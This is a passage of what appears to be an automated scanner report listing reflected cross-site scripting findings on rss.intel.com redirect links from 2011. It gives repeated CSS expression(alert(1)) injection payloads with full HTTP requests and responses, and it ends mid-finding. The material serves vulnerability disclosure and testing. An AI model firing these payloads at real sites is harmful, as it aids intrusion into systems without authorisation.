GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/201181880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:25 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.33. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f was submitted in the REST URL parameter 8. This input was echoed as d8cfc"style="x:expression(alert(1))"cbc4fac7e2f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.34. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e was submitted in the REST URL parameter 9. This input was echoed as bac26"style="x:expression(alert(1))"4f9f28749e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 255
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style="x:expression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.35. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28736"style%3d"x%3aexpression(alert(1))"42af1674784 was submitted in the REST URL parameter 10. This input was echoed as 28736"style="x:expression(alert(1))"42af1674784 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style%3d"x%3aexpression(alert(1))"42af1674784 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard28736"style="x:expression(alert(1))"42af1674784?cid=rss-182178-c1-264138">
...[SNIP]...

4.36. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a was submitted in the REST URL parameter 2. This input was echoed as 1c387"style="x:expression(alert(1))"2f6f6c3797a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-2641381c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a">
...[SNIP]...

4.37. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834 was submitted in the REST URL parameter 3. This input was echoed as 1d31a"style="x:expression(alert(1))"60bb2fac834 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard">
...[SNIP]...

4.38. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac was submitted in the REST URL parameter 4. This input was echoed as 65b1a"style="x:expression(alert(1))"b8c17ee6eac in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.39. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69694"style%3d"x%3aexpression(alert(1))"cb56d7389f was submitted in the REST URL parameter 5. This input was echoed as 69694"style="x:expression(alert(1))"cb56d7389f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom69694"style%3d"x%3aexpression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:13 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 243
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.40. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12c9"style%3d"x%3aexpression(alert(1))"c871cd23475 was submitted in the REST URL parameter 6. This input was echoed as c12c9"style="x:expression(alert(1))"c871cd23475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blogc12c9"style%3d"x%3aexpression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.41. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8552d"style%3d"x%3aexpression(alert(1))"1e321e64d44 was submitted in the REST URL parameter 7. This input was echoed as 8552d"style="x:expression(alert(1))"1e321e64d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/20118552d"style%3d"x%3aexpression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.42. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e56d"style%3d"x%3aexpression(alert(1))"ea92235af50 was submitted in the REST URL parameter 8. This input was echoed as 8e56d"style="x:expression(alert(1))"ea92235af50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style%3d"x%3aexpression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.43. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb was submitted in the REST URL parameter 9. This input was echoed as fafef"style="x:expression(alert(1))"e2545db63fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.44. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 was submitted in the REST URL parameter 10. This input was echoed as eb668"style="x:expression(alert(1))"6213d7b7402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171">
...[SNIP]...

4.45. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70 was submitted in the REST URL parameter 2. This input was echoed as 9eca7"style="x:expression(alert(1))"a9ac5ac8d70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

